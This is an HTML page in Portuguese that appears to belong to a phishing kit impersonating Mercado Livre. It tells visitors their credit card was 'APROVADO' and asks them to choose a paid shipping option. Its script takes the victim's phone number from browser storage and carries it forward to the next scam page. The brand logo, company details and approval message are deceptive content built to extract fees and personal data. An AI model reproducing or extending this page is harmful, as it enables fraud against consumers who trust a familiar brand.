<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Sora:wght@400;700&display=swap" rel="stylesheet">
    <title>Escolha de Envio</title>

    <style>
        body {
            margin: 0;
            font-family: 'Sora', sans-serif;
            background-color: #ffffff;
            color: #333;
        }
        .header {
            display: flex;
            align-items: center;
            padding: 10px;
            border-bottom: 1px solid #aa9900;
            background-color: #FFE600;
        }
        .logo {
            width: 125px;
            padding: 10px;
            margin-left: 20px;
        }
        .content {
            padding: 20px;
            max-width: 600px;
            margin: 0 auto;
        }
        h1 {
            font-size: 24px;
            margin-bottom: 10px;
            text-align: center;
        }
        .shipping-option {
            display: flex;
            align-items: center;
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 8px;
            margin-bottom: 15px;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        .shipping-option:hover {
            background-color: #f5f5f5;
            border-color: #FFE600;
            transform: translateY(-2px);
            box-shadow: 0 4px 8px rgba(0,0,0,0.1);
        }
        .shipping-info {
            flex: 1;
            margin-left: 15px;
        }
        .shipping-price {
            font-weight: bold;
            color: #1f1f1f;
            font-size: 18px;
        }
        .shipping-time {
            color: #666;
            font-size: 14px;
        }
        .button {
            background-color: #FFE600;
            color: #1c1c1c;
            padding: 15px;
            border-radius: 8px;
            border: none;
            width: 100%;
            font-family: 'Sora', sans-serif;
            font-weight: bold;
            font-size: 16px;
            cursor: pointer;
            margin-top: 20px;
            transition: background-color 0.3s;
        }
        .button:hover {
            background-color: #ffd700;
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="images/yuSDX7M.png" alt="Logo Mercado Livre" class="logo">
    </div>

    <div class="content">
        <h1>Escolha o método de envio</h1>
        <p style="color: #666; margin-bottom: 30px; text-align: center;">
            Agora basta escolher uma forma de envio do seu Cartão de Crédito <strong>APROVADO</strong>
        </p>

        <div class="shipping-option" onclick="redirectToShipping('13-1/index-2.html')">
            <span style="font-size: 32px; color: #002d74;">📦</span>
            <div class="shipping-info">
                <div style="font-size: 18px; font-weight: bold;">SEDEX</div>
                <div class="shipping-time">1-2 dias úteis</div>
            </div>
            <div class="shipping-price">R$ 33,90</div>
        </div>

        <div class="shipping-option" onclick="redirectToShipping('13-3/index-2.html')">
            <span style="font-size: 32px; color: #002d74;">📬</span>
            <div class="shipping-info">
                <div style="font-size: 18px; font-weight: bold;">PAC</div>
                <div class="shipping-time">7 dias úteis</div>
            </div>
            <div class="shipping-price">R$ 27,90</div>
        </div>

        <footer style="padding: 10px 15px; text-align: center; margin-top: 50px; background-color: #f9f9f9; border-top: 1px solid #eaeaea; font-family: 'Sora', sans-serif;">
            <div style="max-width: 600px; margin: 0 auto;">
                <p style="color: #777; font-size: 10px; margin-bottom: 5px; line-height: 1.2;">
                    Mercado Livre Brasil LTDA | CNPJ: 79.379.491.0008-50
                </p>
                <p style="color: #777; font-size: 10px; margin-bottom: 5px; line-height: 1.2;">
                    Av. das Nações Unidas, 3000 - Bonfim, Osasco - SP, 06233-903
                </p>
                <p style="color: #999; font-size: 9px; margin-top: 5px;">
                    © 2025 - Todos os direitos reservados
                </p>
            </div>
        </footer>
    </div>

    <script>
        // Função de redirecionamento corrigida e testada
        function redirectToShipping(url) {
            try {
                // 1. Coletar todos os parâmetros atuais
                const currentParams = new URLSearchParams(window.location.search);
                
                // 2. Adicionar telefone do localStorage
                const savedPhone = localStorage.getItem('telefone');
                if (savedPhone) {
                    currentParams.set('telephone', savedPhone.replace(/\D/g, ''));
                }
                
                // 3. Garantir parâmetros essenciais
                if (!currentParams.has('utm_source')) {
                    currentParams.set('utm_source', 'mercadolivre');
                }
                
                // 4. Construir URL final
                const separator = url.includes('?') ? '&' : '?';
                const finalUrl = url + separator + currentParams.toString();
                
                // 5. Redirecionar com verificação
                if (finalUrl && finalUrl.startsWith('http')) {
                    window.location.href = finalUrl;
                } else {
                    // Fallback para caminho relativo
                    window.location.href = window.location.origin + '/' + finalUrl;
                }
                
            } catch (error) {
                console.error('Erro no redirecionamento:', error);
                // Fallback básico
                window.location.href = url;
            }
        }

        // Função auxiliar para debug (pode remover depois)
        function debugRedirect() {
            console.log('Telefone no localStorage:', localStorage.getItem('telefone'));
            console.log('Parâmetros atuais:', new URLSearchParams(window.location.search).toString());
        }
        
        // Inicializar debug (opcional)
        debugRedirect();
    </script>
</body>
</html>